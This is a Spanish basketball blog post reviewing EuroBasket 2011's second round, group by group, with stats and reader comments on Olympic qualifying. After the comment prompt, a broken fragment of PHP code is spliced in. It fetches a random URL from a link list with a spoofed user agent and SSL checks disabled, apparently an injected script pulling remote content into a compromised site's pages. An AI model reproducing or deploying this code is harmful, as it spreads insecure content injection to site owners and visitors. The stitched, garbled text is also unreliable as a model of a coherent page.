EuroNBAsket 2011: 2ª Jornada

02 de September de 2011 por TheDeerHunter

Segunda jornada. Las exhibiciones individuales se han diluido un cierto grado y en particular las de los representantes NBA, pero hemos disfrutado ya de algún partido al límite y también de alguna sorpresa. De todas maneras nada termina de enjuagar el regusto a bacalá de esta primera ronda por el abismo de nivel que se evidencia entre ciertas selecciones.

GRUPO A

Portugal 73 – España 87: Casi 76 puntos encajados por partido frente a selecciones de tal categoría indican que “La roja” no convence. La buena noticia es que Pau y Navarro están finos, la mala es que hay demasiadas piezas clave desconectadas y el sistema hace aguas. Si alguien no tiene la confianza para anotar un lanzamiento franco en un partido xixinabo como éste no la va a tener en un cruce a muerte contra defensores que nada tienen que ver con los de ayer. Hubiera estado bien aprovechar este plácido comienzo para recuperar sensaciones, sin embargo el 9 de 23 en triples que te endosa Portugal parece evocar la terrible defensa de perímetro que costó la eliminación en el mundial. Mención a parte se la lleva hoy Felipe: “Ole tus…”

Destacado NBA: Pau Gasol 20 ptos, 5 reb, 1 asis, 1 rob, 1 tap (19 min)

Gran Bretaña 61 – Turquía 90: Nuevo paseo militar otomano basado en una defensa de las de verdad y un ataque demoledor. Deng está demasiado solo para aspirar a ser un buen sparring. Ayer casi ni eso y los turcos se aburrieron con minutos de la basura desde el final del primer cuarto.

Destacado NBA: Luol Deng 22 ptos, 8 reb, 2 rob
Destacados resto: Emir Preldzic 15 ptos, 6 asis, 4 reb (15 min) y Oguz Savas 12 ptos (6/6 TC), 3 reb, 1 asis, 1 rob (10 min)

Polonia 77 – Lituania 97: Con casi un 80% de acierto, y doblando en rebotes y asistencias a tu rival es entendible según qué licencias. 19 pérdidas y un último cuarto de siesta para los locales. Pudimos ver un buen rato a Valanciunas, aunque 5 de las 19 pérdidas fueron suyas y le vimos tendencia a acumular faltas.

Destacado: Mantas Kalnietis 19 ptos (8/8 TC), 6 reb, 6 asis, 1 rob

GRUPO B

Letonia 77 – Serbia 92: Se la prometían felices los serbios con un primer parcial de 7-23 pero tocó ponerse serios cuando los jugones letones empezaron a clavarlas. Éste equipo tiene eso: peligrosos y descarados pero irregulares, difusos y vulnerables. El maestro Ivkovic no llegó a encontrar la manera de controlar a sus correosos rivales pero a cambio explotó el agujero defensivo abusando con Krstic y Savanovic frente a los cuales los letones no demostraron tener oposición.

Destacados: Nenad Krstic 23 ptos, 3 reb, 2 asis; Dusko Savanovic 19 ptos, 5 reb, 2 tap, 1 asis; Rolands Freimanis 19 ptos, 8 reb, 1 tap

Israel 68 – Francia 85: Francia vela armas previo a comenzar el campeonato de verdad. Tampoco Israel tuvo nada que hacer frente al poderío de los franceses. Parker en modo MVP con Noah y Batum de escuderos de superlujo. Diferencia abismal bajo tableros y para colmo ayer les entraron los tiros de tres a los “bleus”.

Destacado NBA: Tony Parker 21 ptos, 8 asis, 1 reb

Italia 62 – Alemania 76: Italia tiene un pie fuera. No es que pierdan sino cómo se pierden. Había alguno que vaticinaba que tenían garantizados 50 puntos NBA por partido. Imposible si lo que aspiran es a meter 60 en total… y a qué precio. El tridente NBA trasalpino se combinó ayer en un feo 13 de 43. El peor Bargnani, por si alguno confiaba en un do de pecho en el momento decisivo. Por su parte el martillo y yunque de los alemanes parece sólido. Nowitzki&Kaman se postulan para la mejor pareja interior del campeonato y el resto va haciendo bien su trabajo. Cuidado porque bien puede ser éste el cruce para España.

Destacados NBA: Dirk Nowitzki 21 ptos, 12 reb, 2 asis; Chris Kaman 17 ptos, 17 reb, 1 tap

GRUPO C

Bosnia-Herzegovina 94 – Montenegro 86: Fantástico duelo nos ofrecieron estas dos selecciones balcánicas. El grupo se pone al rojo vivo. Teletovic despertó y la lió. Junto a Dedovic hicieron polvo los sistemas montenegrinos y es que recibiendo un castigo de 15 de 33 en triples y casi un 70% de dos de poco sirve contar con superioridad interior. Por un momento parecía que el resurgir de Pekovic junto al buen hacer de Dasic (buscando un triple doble) y Cook suponía que Montenegro podía encajar el intercambio de golpes. Mucha tela hubiera sido recibir 27 en el decisivo y aún así optar a algo.

Destacados: Mirza Teletovic 23 ptos, 4 reb, 2 asis, 2 rob, 1 tap; Nihad Dedovic 19 ptos, 5 reb, 5 asis, 2 rob, 1 tap
Vladimir Dasic 14 ptos, 11 reb, 7 asis, 3 rob

Finlandia 61 – Grecia 81: Los nórdicos tienen muy pocos argumentos más allá de ver si suena la flauta con el triple. Lo mismo da tirar de dos que de tres, balones a Koponen y a correr. No hay que olvidar que de los griegos se pueden decir muchas cosas pero no que se chupan el dedo defensivamente. Con todo, a mí que el líder tenga que ser Bourousis me escama ligeramente.

Destacado: Ioannis Bourousis 19 ptos, 10 reb, 3 tap, 2 rob

Macedonia 78 – Croacia 76: Si hay alguna selección de (cierto) nivel susceptible de meter el remo esa es Croacia. En una actuación discreta de Bogdanovic se las apañaron para complicarse la vida en un partido en el que eran sutilmente mejores en casi todo. Macedonia tuvo el acierto de lograr hasta 7 robos clave, que unido a fallos puntuales en los tiros libres y a una defensa penosa en la última penetración de Ilievsky provocaron la derrota croata.

Destacado: Vlado Ilievsky 18 ptos, 3 reb, 3 asis

GRUPO D

Bulgaria 68 – Bélgica 65: Al final el grupo más feo va a resultar ser el D. Partido espeso entre las dos cenicientas del grupo que pudo llevarse cualquiera. Los belgas parecían mínimamente más acertados pero les faltó un referente anotador que los búlgaros sí tuvieron en Rowland. La diferencia la marcan 9 tiros libres anotados en un choque tan ajustado.

Destacado: Earl Rowland 22 ptos, 2 reb, 2 asis, 2 rob

Georgia 58 – Rusia 65: Rusia terminó viéndole las orejas al lobo tras lo que parecía un compromiso resuelto en la primera parte. Buena reacción de la mano de Markoishvili que Kirilenko se encargó de abortar. El ritmo y la espectacularidad del choque queda ilustrado en el 13-13 del cuarto final.

Destacado NBA: Andrei Kirilenko 20 ptos, 4 reb, 3 rob
Destacado resto: Manuchar Markoishvili 21 ptos, 3 reb, 1 asis, 2 rob

Ukrania 64 – Eslovenia 68: A menos de 70 puntos hay pocos que le ganen al maestro Maljkovic.¡ Quién ha visto jugar a los eslovenos y quién los ve ahora! Con todo, jugar feo parece que les va a garantizar avanzar esta liguilla. Ukrania es un querer y no poder. Horrible Dragic.

Destacado: Mirza Begic 14 ptos, 7 reb, 2 asis, 2 tap

Comenta

5 comentarios a esta entrada

  1. German dice:
    #1

    Que bueno volver a leer este magnifico blog! Y mas con informacion del Eurobasket que aqui en Argentina no abunda. Queria preguntarles cuantos clasifican a las Juegos Olimpicos? La verdad que es un torneazo por la calidad de jugadores que hay.

    Por estos lados se esta jugando en Mar Del Plata el Preolimpico de las Americas que otorga solo dos plazas para Londres 2012. Tambien se espera buen nivel con 15 NBA distribuidos en 7 equipos.

    Grupo A
    Brasil (de sus NBA, solo Splitter esta)
    Republica Dominicana (Horford, Garcia y Villanueva)
    Venezuela (Greivis Vazquez)
    Canada (Joel Antonhy, Andy Rautins y Corey Joseph aunque aun no debuto)
    Cuba

    Grupo B
    Argentina (Manu, Scola, Delfino, Nocioni)
    Puerto Rico (JJ Barea, Arroyo y Balkman)
    Uruguay
    Panama (Gary Forbes)
    Paraguay

    Y tambien hay varios que alguna vez pasaron por la mejor liga del mundo como Oberto, Pepe Sanchez, Marquinhos, Daniel Santiago, el uruguayo Batista, etc.

    Pasan los cuatro primeros de cada grupo arrastrando los resultados entre los clasificados y se enfrentan solo con los cuatro del otro grupo. Luego juegan semifinales el 1 vs 4 y 2 vs 3. Los ganadores de las semis clasifican a Londres, del tercero al quinto van al repechaje.

    En los dos primeros dias no hubo muchas sorpresas… Brasil le gano a Venezuela recien en los ultimos minutos y luego tranquilo a Canada. Dominicana aplasto a Cuba y despues sufrio hasta el final con los venezolanos (92-89).

    Argentina arranco muy tranquilo contra Paraguay (84-52) dandole mucho descanso a los NBA, al dia siguiente jugo un partido excelente ante Uruguay (86-51), en un momento iba 74-29…
    Por su parte Puerto Rico aplasto a primero a Panama (99-66) y luego a Paraguay (101-55)

    Por lo poco visto hasta ahora me parece q hay que tener cuidado con Venezuela, los he visto en vivo en un partido de preparacion con Argentina remontando 21 puntos y pese a que igual terminaron perdiendo es un equipo que sabe muy bien lo que hace… quizas alguna sorpresa puedan dar.

      Citar

  2. TheDeerHunter dice:
    #2

    Gracias German.
    Si no me equivoco Gran Bretaña tiene la plaza asegurada y sólo los finalistas se clasificarían vía este eurobasket.
    El nº de plazas vía repescas y demás lo tendría que mirar…

      Citar

  3. Txusma dice:
    #3

    Oye, Germán. La información es tan buena que creo que deberíamos publicarla. Te gustaría encargarte del seguimiento del Preolímpico de las Arenas? Si te parece bien escríbeme a txusma@tjnba.com y concretamos.

    Muchas gracias!

      Citar

  4. German dice:
    #4

    Muchas gracias DeerHunter, se me habia pasado por alto que Gran Bretaña ya esta clasificado por ser local. Durisimo torneo entonces si solo los finalistas aseguran su plaza, es una pena que varias selecciones potentes se queden afuera.

    Sera un placer Txusma! Ahora te escribo asi combinamos!

      Citar

  5. Cocinitas dice:
    #5

    Si solo hay dos plazas via europeo y se jugaran 3 plazas más en el preolimpico que se disputara en Julio del proximo año.
    Hoy he visto el España- Gran Bretaña y cada vez tengo más claro que a Scariolo le viene grande esta selección madre mia. Me ha gustado mucho Marc hoy, si los Memphis lo quieren mantener van a tener q soltar una buena pasta, porque ahora mismo es de los mejores 5 que hay en la NBA.
    También he visto el Francia- Alemania, me parece que alemania tiene un buen equipo con Kaman y Nowitzki, pero en cuanto falta uno sufre muchisimo en ataque. Partidazo de Parker con Francia anotando 32 puntos y consolidandose como el máximo anotador del torneo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>